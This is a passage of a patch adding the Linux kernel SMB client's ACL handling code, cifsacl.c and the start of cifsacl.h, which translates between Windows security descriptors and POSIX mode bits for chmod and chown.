++				} else if (compare_sids(&(ppace[i]->sid), pgrpsid) == 0) {
++					access_flags_to_mode(ppace[i]->access_req,
++							ppace[i]->type,
++							&fattr->cf_mode,
++							&denied_mode,
++							ACL_GROUP_MASK);
++				} else if ((compare_sids(&(ppace[i]->sid), &sid_everyone) == 0) ||
++						(compare_sids(&(ppace[i]->sid), &sid_authusers) == 0)) {
++					access_flags_to_mode(ppace[i]->access_req,
++							ppace[i]->type,
++							&fattr->cf_mode,
++							&denied_mode,
++							ACL_EVERYONE_MASK);
++				}
++			}
++
++
++/*			memcpy((void *)(&(cifscred->aces[i])),
++				(void *)ppace[i],
++				sizeof(struct cifs_ace)); */
++
++			acl_base = (char *)ppace[i];
++			acl_size = le16_to_cpu(ppace[i]->size);
++		}
++
++		kfree(ppace);
++	}
++
++	return;
++}
++
++unsigned int setup_authusers_ACE(struct cifs_ace *pntace)
++{
++	int i;
++	unsigned int ace_size = 20;
++
++	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
++	pntace->flags = 0x0;
++	pntace->access_req = cpu_to_le32(GENERIC_ALL);
++	pntace->sid.num_subauth = 1;
++	pntace->sid.revision = 1;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] =  sid_authusers.authority[i];
++
++	pntace->sid.sub_auth[0] =  sid_authusers.sub_auth[0];
++
++	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
++	pntace->size = cpu_to_le16(ace_size);
++	return ace_size;
++}
++
++/*
++ * Fill in the special SID based on the mode. See
++ * https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++unsigned int setup_special_mode_ACE(struct cifs_ace *pntace, __u64 nmode)
++{
++	int i;
++	unsigned int ace_size = 28;
++
++	pntace->type = ACCESS_DENIED_ACE_TYPE;
++	pntace->flags = 0x0;
++	pntace->access_req = 0;
++	pntace->sid.num_subauth = 3;
++	pntace->sid.revision = 1;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = sid_unix_NFS_mode.authority[i];
++
++	pntace->sid.sub_auth[0] = sid_unix_NFS_mode.sub_auth[0];
++	pntace->sid.sub_auth[1] = sid_unix_NFS_mode.sub_auth[1];
++	pntace->sid.sub_auth[2] = cpu_to_le32(nmode & 07777);
++
++	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
++	pntace->size = cpu_to_le16(ace_size);
++	return ace_size;
++}
++
++unsigned int setup_special_user_owner_ACE(struct cifs_ace *pntace)
++{
++	int i;
++	unsigned int ace_size = 28;
++
++	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
++	pntace->flags = 0x0;
++	pntace->access_req = cpu_to_le32(GENERIC_ALL);
++	pntace->sid.num_subauth = 3;
++	pntace->sid.revision = 1;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = sid_unix_NFS_users.authority[i];
++
++	pntace->sid.sub_auth[0] = sid_unix_NFS_users.sub_auth[0];
++	pntace->sid.sub_auth[1] = sid_unix_NFS_users.sub_auth[1];
++	pntace->sid.sub_auth[2] = cpu_to_le32(current_fsgid().val);
++
++	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
++	pntace->size = cpu_to_le16(ace_size);
++	return ace_size;
++}
++
++static void populate_new_aces(char *nacl_base,
++		struct cifs_sid *pownersid,
++		struct cifs_sid *pgrpsid,
++		__u64 *pnmode, u32 *pnum_aces, u16 *pnsize,
++		bool modefromsid)
++{
++	__u64 nmode;
++	u32 num_aces = 0;
++	u16 nsize = 0;
++	__u64 user_mode;
++	__u64 group_mode;
++	__u64 other_mode;
++	__u64 deny_user_mode = 0;
++	__u64 deny_group_mode = 0;
++	bool sticky_set = false;
++	struct cifs_ace *pnntace = NULL;
++
++	nmode = *pnmode;
++	num_aces = *pnum_aces;
++	nsize = *pnsize;
++
++	if (modefromsid) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += setup_special_mode_ACE(pnntace, nmode);
++		num_aces++;
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += setup_authusers_ACE(pnntace);
++		num_aces++;
++		goto set_size;
++	}
++
++	/*
++	 * We'll try to keep the mode as requested by the user.
++	 * But in cases where we cannot meaningfully convert that
++	 * into ACL, return back the updated mode, so that it is
++	 * updated in the inode.
++	 */
++
++	if (!memcmp(pownersid, pgrpsid, sizeof(struct cifs_sid))) {
++		/*
++		 * Case when owner and group SIDs are the same.
++		 * Set the more restrictive of the two modes.
++		 */
++		user_mode = nmode & (nmode << 3) & 0700;
++		group_mode = nmode & (nmode >> 3) & 0070;
++	} else {
++		user_mode = nmode & 0700;
++		group_mode = nmode & 0070;
++	}
++
++	other_mode = nmode & 0007;
++
++	/* We need DENY ACE when the perm is more restrictive than the next sets. */
++	deny_user_mode = ~(user_mode) & ((group_mode << 3) | (other_mode << 6)) & 0700;
++	deny_group_mode = ~(group_mode) & (other_mode << 3) & 0070;
++
++	*pnmode = user_mode | group_mode | other_mode | (nmode & ~0777);
++
++	/* This tells if we should allow delete child for group and everyone. */
++	if (nmode & 01000)
++		sticky_set = true;
++
++	if (deny_user_mode) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += fill_ace_for_sid(pnntace, pownersid, deny_user_mode,
++				0700, ACCESS_DENIED, false);
++		num_aces++;
++	}
++
++	/* Group DENY ACE does not conflict with owner ALLOW ACE. Keep in preferred order*/
++	if (deny_group_mode && !(deny_group_mode & (user_mode >> 3))) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
++				0070, ACCESS_DENIED, false);
++		num_aces++;
++	}
++
++	pnntace = (struct cifs_ace *) (nacl_base + nsize);
++	nsize += fill_ace_for_sid(pnntace, pownersid, user_mode,
++			0700, ACCESS_ALLOWED, true);
++	num_aces++;
++
++	/* Group DENY ACE conflicts with owner ALLOW ACE. So keep it after. */
++	if (deny_group_mode && (deny_group_mode & (user_mode >> 3))) {
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
++				0070, ACCESS_DENIED, false);
++		num_aces++;
++	}
++
++	pnntace = (struct cifs_ace *) (nacl_base + nsize);
++	nsize += fill_ace_for_sid(pnntace, pgrpsid, group_mode,
++			0070, ACCESS_ALLOWED, !sticky_set);
++	num_aces++;
++
++	pnntace = (struct cifs_ace *) (nacl_base + nsize);
++	nsize += fill_ace_for_sid(pnntace, &sid_everyone, other_mode,
++			0007, ACCESS_ALLOWED, !sticky_set);
++	num_aces++;
++
++set_size:
++	*pnum_aces = num_aces;
++	*pnsize = nsize;
++}
++
++static __u16 replace_sids_and_copy_aces(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
++		struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
++		struct cifs_sid *pnownersid, struct cifs_sid *pngrpsid)
++{
++	int i;
++	u16 size = 0;
++	struct cifs_ace *pntace = NULL;
++	char *acl_base = NULL;
++	u32 src_num_aces = 0;
++	u16 nsize = 0;
++	struct cifs_ace *pnntace = NULL;
++	char *nacl_base = NULL;
++	u16 ace_size = 0;
++
++	acl_base = (char *)pdacl;
++	size = sizeof(struct cifs_acl);
++	src_num_aces = le32_to_cpu(pdacl->num_aces);
++
++	nacl_base = (char *)pndacl;
++	nsize = sizeof(struct cifs_acl);
++
++	/* Go through all the ACEs */
++	for (i = 0; i < src_num_aces; ++i) {
++		pntace = (struct cifs_ace *) (acl_base + size);
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++
++		if (pnownersid && compare_sids(&pntace->sid, pownersid) == 0)
++			ace_size = cifs_copy_ace(pnntace, pntace, pnownersid);
++		else if (pngrpsid && compare_sids(&pntace->sid, pgrpsid) == 0)
++			ace_size = cifs_copy_ace(pnntace, pntace, pngrpsid);
++		else
++			ace_size = cifs_copy_ace(pnntace, pntace, NULL);
++
++		size += le16_to_cpu(pntace->size);
++		nsize += ace_size;
++	}
++
++	return nsize;
++}
++
++static int set_chmod_dacl(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
++		struct cifs_sid *pownersid,	struct cifs_sid *pgrpsid,
++		__u64 *pnmode, bool mode_from_sid)
++{
++	int i;
++	u16 size = 0;
++	struct cifs_ace *pntace = NULL;
++	char *acl_base = NULL;
++	u32 src_num_aces = 0;
++	u16 nsize = 0;
++	struct cifs_ace *pnntace = NULL;
++	char *nacl_base = NULL;
++	u32 num_aces = 0;
++	bool new_aces_set = false;
++
++	/* Assuming that pndacl and pnmode are never NULL */
++	nacl_base = (char *)pndacl;
++	nsize = sizeof(struct cifs_acl);
++
++	/* If pdacl is NULL, we don't have a src. Simply populate new ACL. */
++	if (!pdacl) {
++		populate_new_aces(nacl_base,
++				pownersid, pgrpsid,
++				pnmode, &num_aces, &nsize,
++				mode_from_sid);
++		goto finalize_dacl;
++	}
++
++	acl_base = (char *)pdacl;
++	size = sizeof(struct cifs_acl);
++	src_num_aces = le32_to_cpu(pdacl->num_aces);
++
++	/* Retain old ACEs which we can retain */
++	for (i = 0; i < src_num_aces; ++i) {
++		pntace = (struct cifs_ace *) (acl_base + size);
++
++		if (!new_aces_set && (pntace->flags & INHERITED_ACE)) {
++			/* Place the new ACEs in between existing explicit and inherited */
++			populate_new_aces(nacl_base,
++					pownersid, pgrpsid,
++					pnmode, &num_aces, &nsize,
++					mode_from_sid);
++
++			new_aces_set = true;
++		}
++
++		/* If it's any one of the ACE we're replacing, skip! */
++		if (((compare_sids(&pntace->sid, &sid_unix_NFS_mode) == 0) ||
++				(compare_sids(&pntace->sid, pownersid) == 0) ||
++				(compare_sids(&pntace->sid, pgrpsid) == 0) ||
++				(compare_sids(&pntace->sid, &sid_everyone) == 0) ||
++				(compare_sids(&pntace->sid, &sid_authusers) == 0))) {
++			goto next_ace;
++		}
++
++		/* update the pointer to the next ACE to populate*/
++		pnntace = (struct cifs_ace *) (nacl_base + nsize);
++
++		nsize += cifs_copy_ace(pnntace, pntace, NULL);
++		num_aces++;
++
++next_ace:
++		size += le16_to_cpu(pntace->size);
++	}
++
++	/* If inherited ACEs are not present, place the new ones at the tail */
++	if (!new_aces_set) {
++		populate_new_aces(nacl_base,
++				pownersid, pgrpsid,
++				pnmode, &num_aces, &nsize,
++				mode_from_sid);
++
++		new_aces_set = true;
++	}
++
++finalize_dacl:
++	pndacl->num_aces = cpu_to_le32(num_aces);
++	pndacl->size = cpu_to_le16(nsize);
++
++	return 0;
++}
++
++static int parse_sid(struct cifs_sid *psid, char *end_of_acl)
++{
++	/* BB need to add parm so we can store the SID BB */
++
++	/* validate that we do not go past end of ACL - sid must be at least 8
++	   bytes long (assuming no sub-auths - e.g. the null SID */
++	if (end_of_acl < (char *)psid + 8) {
++		cifs_dbg(VFS, "ACL too small to parse SID %p\n", psid);
++		return -EINVAL;
++	}
++
++#ifdef CONFIG_CIFS_DEBUG2
++	if (psid->num_subauth) {
++		int i;
++		cifs_dbg(FYI, "SID revision %d num_auth %d\n",
++			 psid->revision, psid->num_subauth);
++
++		for (i = 0; i < psid->num_subauth; i++) {
++			cifs_dbg(FYI, "SID sub_auth[%d]: 0x%x\n",
++				 i, le32_to_cpu(psid->sub_auth[i]));
++		}
++
++		/* BB add length check to make sure that we do not have huge
++			num auths and therefore go off the end */
++		cifs_dbg(FYI, "RID 0x%x\n",
++			 le32_to_cpu(psid->sub_auth[psid->num_subauth-1]));
++	}
++#endif
++
++	return 0;
++}
++
++
++/* Convert CIFS ACL to POSIX form */
++static int parse_sec_desc(struct cifs_sb_info *cifs_sb,
++		struct cifs_ntsd *pntsd, int acl_len, struct cifs_fattr *fattr,
++		bool get_mode_from_special_sid)
++{
++	int rc = 0;
++	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
++	struct cifs_acl *dacl_ptr; /* no need for SACL ptr */
++	char *end_of_acl = ((char *)pntsd) + acl_len;
++	__u32 dacloffset;
++
++	if (pntsd == NULL)
++		return -EIO;
++
++	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->osidoffset));
++	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++				le32_to_cpu(pntsd->gsidoffset));
++	dacloffset = le32_to_cpu(pntsd->dacloffset);
++	dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
++	cifs_dbg(NOISY, "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
++		 pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
++		 le32_to_cpu(pntsd->gsidoffset),
++		 le32_to_cpu(pntsd->sacloffset), dacloffset);
++/*	cifs_dump_mem("owner_sid: ", owner_sid_ptr, 64); */
++	rc = parse_sid(owner_sid_ptr, end_of_acl);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d parsing Owner SID\n", __func__, rc);
++		return rc;
++	}
++	rc = sid_to_id(cifs_sb, owner_sid_ptr, fattr, SIDOWNER);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d mapping Owner SID to uid\n",
++			 __func__, rc);
++		return rc;
++	}
++
++	rc = parse_sid(group_sid_ptr, end_of_acl);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d mapping Owner SID to gid\n",
++			 __func__, rc);
++		return rc;
++	}
++	rc = sid_to_id(cifs_sb, group_sid_ptr, fattr, SIDGROUP);
++	if (rc) {
++		cifs_dbg(FYI, "%s: Error %d mapping Group SID to gid\n",
++			 __func__, rc);
++		return rc;
++	}
++
++	if (dacloffset)
++		parse_dacl(dacl_ptr, end_of_acl, owner_sid_ptr,
++			   group_sid_ptr, fattr, get_mode_from_special_sid);
++	else
++		cifs_dbg(FYI, "no ACL\n"); /* BB grant all or default perms? */
++
++	return rc;
++}
++
++/* Convert permission bits from mode to equivalent CIFS ACL */
++static int build_sec_desc(struct cifs_ntsd *pntsd, struct cifs_ntsd *pnntsd,
++	__u32 secdesclen, __u32 *pnsecdesclen, __u64 *pnmode, kuid_t uid, kgid_t gid,
++	bool mode_from_sid, bool id_from_sid, int *aclflag)
++{
++	int rc = 0;
++	__u32 dacloffset;
++	__u32 ndacloffset;
++	__u32 sidsoffset;
++	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
++	struct cifs_sid *nowner_sid_ptr = NULL, *ngroup_sid_ptr = NULL;
++	struct cifs_acl *dacl_ptr = NULL;  /* no need for SACL ptr */
++	struct cifs_acl *ndacl_ptr = NULL; /* no need for SACL ptr */
++	char *end_of_acl = ((char *)pntsd) + secdesclen;
++	u16 size = 0;
++
++	dacloffset = le32_to_cpu(pntsd->dacloffset);
++	if (dacloffset) {
++		dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
++		if (end_of_acl < (char *)dacl_ptr + le16_to_cpu(dacl_ptr->size)) {
++			cifs_dbg(VFS, "Server returned illegal ACL size\n");
++			return -EINVAL;
++		}
++	}
++
++	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->osidoffset));
++	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->gsidoffset));
++
++	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
++		ndacloffset = sizeof(struct cifs_ntsd);
++		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
++		ndacl_ptr->revision =
++			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
++
++		ndacl_ptr->size = cpu_to_le16(0);
++		ndacl_ptr->num_aces = cpu_to_le32(0);
++
++		rc = set_chmod_dacl(dacl_ptr, ndacl_ptr, owner_sid_ptr, group_sid_ptr,
++				    pnmode, mode_from_sid);
++
++		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
++		/* copy the non-dacl portion of secdesc */
++		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
++				NULL, NULL);
++
++		*aclflag |= CIFS_ACL_DACL;
++	} else {
++		ndacloffset = sizeof(struct cifs_ntsd);
++		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
++		ndacl_ptr->revision =
++			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
++		ndacl_ptr->num_aces = dacl_ptr ? dacl_ptr->num_aces : 0;
++
++		if (uid_valid(uid)) { /* chown */
++			uid_t id;
++			nowner_sid_ptr = kzalloc(sizeof(struct cifs_sid),
++								GFP_KERNEL);
++			if (!nowner_sid_ptr) {
++				rc = -ENOMEM;
++				goto chown_chgrp_exit;
++			}
++			id = from_kuid(&init_user_ns, uid);
++			if (id_from_sid) {
++				struct owner_sid *osid = (struct owner_sid *)nowner_sid_ptr;
++				/* Populate the user ownership fields S-1-5-88-1 */
++				osid->Revision = 1;
++				osid->NumAuth = 3;
++				osid->Authority[5] = 5;
++				osid->SubAuthorities[0] = cpu_to_le32(88);
++				osid->SubAuthorities[1] = cpu_to_le32(1);
++				osid->SubAuthorities[2] = cpu_to_le32(id);
++
++			} else { /* lookup sid with upcall */
++				rc = id_to_sid(id, SIDOWNER, nowner_sid_ptr);
++				if (rc) {
++					cifs_dbg(FYI, "%s: Mapping error %d for owner id %d\n",
++						 __func__, rc, id);
++					goto chown_chgrp_exit;
++				}
++			}
++			*aclflag |= CIFS_ACL_OWNER;
++		}
++		if (gid_valid(gid)) { /* chgrp */
++			gid_t id;
++			ngroup_sid_ptr = kzalloc(sizeof(struct cifs_sid),
++								GFP_KERNEL);
++			if (!ngroup_sid_ptr) {
++				rc = -ENOMEM;
++				goto chown_chgrp_exit;
++			}
++			id = from_kgid(&init_user_ns, gid);
++			if (id_from_sid) {
++				struct owner_sid *gsid = (struct owner_sid *)ngroup_sid_ptr;
++				/* Populate the group ownership fields S-1-5-88-2 */
++				gsid->Revision = 1;
++				gsid->NumAuth = 3;
++				gsid->Authority[5] = 5;
++				gsid->SubAuthorities[0] = cpu_to_le32(88);
++				gsid->SubAuthorities[1] = cpu_to_le32(2);
++				gsid->SubAuthorities[2] = cpu_to_le32(id);
++
++			} else { /* lookup sid with upcall */
++				rc = id_to_sid(id, SIDGROUP, ngroup_sid_ptr);
++				if (rc) {
++					cifs_dbg(FYI, "%s: Mapping error %d for group id %d\n",
++						 __func__, rc, id);
++					goto chown_chgrp_exit;
++				}
++			}
++			*aclflag |= CIFS_ACL_GROUP;
++		}
++
++		if (dacloffset) {
++			/* Replace ACEs for old owner with new one */
++			size = replace_sids_and_copy_aces(dacl_ptr, ndacl_ptr,
++					owner_sid_ptr, group_sid_ptr,
++					nowner_sid_ptr, ngroup_sid_ptr);
++			ndacl_ptr->size = cpu_to_le16(size);
++		}
++
++		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
++		/* copy the non-dacl portion of secdesc */
++		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
++				nowner_sid_ptr, ngroup_sid_ptr);
++
++chown_chgrp_exit:
++		/* errors could jump here. So make sure we return soon after this */
++		kfree(nowner_sid_ptr);
++		kfree(ngroup_sid_ptr);
++	}
++
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *cifs_sb,
++				      const struct cifs_fid *cifsfid, u32 *pacllen,
++				      u32 __maybe_unused unused)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	unsigned int xid;
++	int rc;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	xid = get_xid();
++	rc = CIFSSMBGetCIFSACL(xid, tlink_tcon(tlink), cifsfid->netfid, &pntsd,
++				pacllen);
++	free_xid(xid);
++
++	cifs_put_tlink(tlink);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++}
++
++static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
++		const char *path, u32 *pacllen)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	int oplock = 0;
++	unsigned int xid;
++	int rc;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = READ_CONTROL,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (!rc) {
++		rc = CIFSSMBGetCIFSACL(xid, tcon, fid.netfid, &pntsd, pacllen);
++		CIFSSMBClose(xid, tcon, fid.netfid);
++	}
++
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++}
++
++/* Retrieve an ACL from the server */
++struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *cifs_sb,
++				      struct inode *inode, const char *path,
++			       u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	struct cifsFileInfo *open_file = NULL;
++
++	if (inode)
++		open_file = find_readable_file(CIFS_I(inode), true);
++	if (!open_file)
++		return get_cifs_acl_by_path(cifs_sb, path, pacllen);
++
++	pntsd = get_cifs_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
++	cifsFileInfo_put(open_file);
++	return pntsd;
++}
++
++ /* Set an ACL on the server */
++int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
++			struct inode *inode, const char *path, int aclflag)
++{
++	int oplock = 0;
++	unsigned int xid;
++	int rc, access_flags;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	if (aclflag == CIFS_ACL_OWNER || aclflag == CIFS_ACL_GROUP)
++		access_flags = WRITE_OWNER;
++	else
++		access_flags = WRITE_DAC;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc) {
++		cifs_dbg(VFS, "Unable to open file to set ACL\n");
++		goto out;
++	}
++
++	rc = CIFSSMBSetCIFSACL(xid, tcon, fid.netfid, pnntsd, acllen, aclflag);
++	cifs_dbg(NOISY, "SetCIFSACL rc = %d\n", rc);
++
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/* Translate the CIFS ACL (similar to NTFS ACL) for a file into mode bits */
++int
++cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
++		  struct inode *inode, bool mode_from_special_sid,
++		  const char *path, const struct cifs_fid *pfid)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	u32 acllen = 0;
++	int rc = 0;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct smb_version_operations *ops;
++	const u32 info = 0;
++
++	cifs_dbg(NOISY, "converting ACL to mode for %s\n", path);
++
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	ops = tlink_tcon(tlink)->ses->server->ops;
++
++	if (pfid && (ops->get_acl_by_fid))
++		pntsd = ops->get_acl_by_fid(cifs_sb, pfid, &acllen, info);
++	else if (ops->get_acl)
++		pntsd = ops->get_acl(cifs_sb, inode, path, &acllen, info);
++	else {
++		cifs_put_tlink(tlink);
++		return -EOPNOTSUPP;
++	}
++	/* if we can retrieve the ACL, now parse Access Control Entries, ACEs */
++	if (IS_ERR(pntsd)) {
++		rc = PTR_ERR(pntsd);
++		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
++	} else if (mode_from_special_sid) {
++		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, true);
++		kfree(pntsd);
++	} else {
++		/* get approximated mode from ACL */
++		rc = parse_sec_desc(cifs_sb, pntsd, acllen, fattr, false);
++		kfree(pntsd);
++		if (rc)
++			cifs_dbg(VFS, "parse sec desc failed rc = %d\n", rc);
++	}
++
++	cifs_put_tlink(tlink);
++
++	return rc;
++}
++
++/* Convert mode bits to an ACL so we can update the ACL on the server */
++int
++id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
++			kuid_t uid, kgid_t gid)
++{
++	int rc = 0;
++	int aclflag = CIFS_ACL_DACL; /* default flag to set */
++	__u32 secdesclen = 0;
++	__u32 nsecdesclen = 0;
++	__u32 dacloffset = 0;
++	struct cifs_acl *dacl_ptr = NULL;
++	struct cifs_ntsd *pntsd = NULL; /* acl obtained from server */
++	struct cifs_ntsd *pnntsd = NULL; /* modified acl to be sent to server */
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct smb_version_operations *ops;
++	bool mode_from_sid, id_from_sid;
++	const u32 info = 0;
++
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	ops = tlink_tcon(tlink)->ses->server->ops;
++
++	cifs_dbg(NOISY, "set ACL from mode for %s\n", path);
++
++	/* Get the security descriptor */
++
++	if (ops->get_acl == NULL) {
++		cifs_put_tlink(tlink);
++		return -EOPNOTSUPP;
++	}
++
++	pntsd = ops->get_acl(cifs_sb, inode, path, &secdesclen, info);
++	if (IS_ERR(pntsd)) {
++		rc = PTR_ERR(pntsd);
++		cifs_dbg(VFS, "%s: error %d getting sec desc\n", __func__, rc);
++		cifs_put_tlink(tlink);
++		return rc;
++	}
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
++		mode_from_sid = true;
++	else
++		mode_from_sid = false;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
++		id_from_sid = true;
++	else
++		id_from_sid = false;
++
++	/* Potentially, five new ACEs can be added to the ACL for U,G,O mapping */
++	nsecdesclen = secdesclen;
++	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
++		if (mode_from_sid)
++			nsecdesclen += 2 * sizeof(struct cifs_ace);
++		else /* cifsacl */
++			nsecdesclen += 5 * sizeof(struct cifs_ace);
++	} else { /* chown */
++		/* When ownership changes, changes new owner sid length could be different */
++		nsecdesclen = sizeof(struct cifs_ntsd) + (sizeof(struct cifs_sid) * 2);
++		dacloffset = le32_to_cpu(pntsd->dacloffset);
++		if (dacloffset) {
++			dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
++			if (mode_from_sid)
++				nsecdesclen +=
++					le32_to_cpu(dacl_ptr->num_aces) * sizeof(struct cifs_ace);
++			else /* cifsacl */
++				nsecdesclen += le16_to_cpu(dacl_ptr->size);
++		}
++	}
++
++	/*
++	 * Add three ACEs for owner, group, everyone getting rid of other ACEs
++	 * as chmod disables ACEs and set the security descriptor. Allocate
++	 * memory for the smb header, set security descriptor request security
++	 * descriptor parameters, and security descriptor itself
++	 */
++	nsecdesclen = max_t(u32, nsecdesclen, DEFAULT_SEC_DESC_LEN);
++	pnntsd = kmalloc(nsecdesclen, GFP_KERNEL);
++	if (!pnntsd) {
++		kfree(pntsd);
++		cifs_put_tlink(tlink);
++		return -ENOMEM;
++	}
++
++	rc = build_sec_desc(pntsd, pnntsd, secdesclen, &nsecdesclen, pnmode, uid, gid,
++			    mode_from_sid, id_from_sid, &aclflag);
++
++	cifs_dbg(NOISY, "build_sec_desc rc: %d\n", rc);
++
++	if (ops->set_acl == NULL)
++		rc = -EOPNOTSUPP;
++
++	if (!rc) {
++		/* Set the security descriptor */
++		rc = ops->set_acl(pnntsd, nsecdesclen, inode, path, aclflag);
++		cifs_dbg(NOISY, "set_cifs_acl rc: %d\n", rc);
++	}
++	cifs_put_tlink(tlink);
++
++	kfree(pnntsd);
++	kfree(pntsd);
++	return rc;
++}
+diff --git a/fs/smb/client/cifsacl.h b/fs/smb/client/cifsacl.h
+new file mode 100644
+index 0000000000000..ccbfc754bd3c7
+--- /dev/null
++++ b/fs/smb/client/cifsacl.h
+@@ -0,0 +1,199 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFSACL_H
++#define _CIFSACL_H
++
++#define NUM_AUTHS (6)	/* number of authority fields */
++#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
++
++#define READ_BIT        0x4
++#define WRITE_BIT       0x2
++#define EXEC_BIT        0x1
++
++#define ACL_OWNER_MASK 0700
++#define ACL_GROUP_MASK 0070
++#define ACL_EVERYONE_MASK 0007
++
++#define UBITSHIFT	6
++#define GBITSHIFT	3
++
